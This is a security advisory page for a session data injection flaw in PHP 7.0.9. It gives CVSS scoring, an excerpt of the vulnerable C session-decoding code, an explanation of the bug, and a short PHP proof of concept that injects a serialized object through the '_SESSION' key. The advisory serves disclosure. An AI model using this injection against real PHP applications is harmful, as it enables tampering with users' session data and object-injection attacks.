PHP 7.0.9 Session Data Injection Vulnerability

2016.09.05
Credit: taoguangchen
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-74


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Description: ------------ PHP Session Data Injection Vulnerability ``` PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */ { ... while (p < endptr) { zval **tmp; q = p; while (*q != PS_DELIMITER) { if (++q >= endptr) goto break_outer_loop; } if (p[0] == PS_UNDEF_MARKER) { p++; has_value = 0; } else { has_value = 1; } namelen = q - p; name = estrndup(p, namelen); q++; if (zend_hash_find(&EG(symbol_table), name, namelen + 1, (void **) &tmp) == SUCCESS) { if ((Z_TYPE_PP(tmp) == IS_ARRAY && Z_ARRVAL_PP(tmp) == &EG(symbol_table)) || *tmp == PS(http_session_vars)) { goto skip; } } ... skip: efree(name); p = q; } ``` If the session name is not allowed, then session php handler will ignore and skip the name, and continue to parsing. This means that if an attacker can control the session name, then he will be able to inject arbitrarily session data. The similar issue also exist in session php_binary handler. PoC: ``` <?php ini_set('session.serialize_handler', 'php'); session_start(); $_SESSION['_SESSION'] = 'ryat|O:8:"stdClass":0:{}'; session_write_close(); session_start(); var_dump($_SESSION); ?> ```

References:

https://bugs.php.net/bug.php?id=72681


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top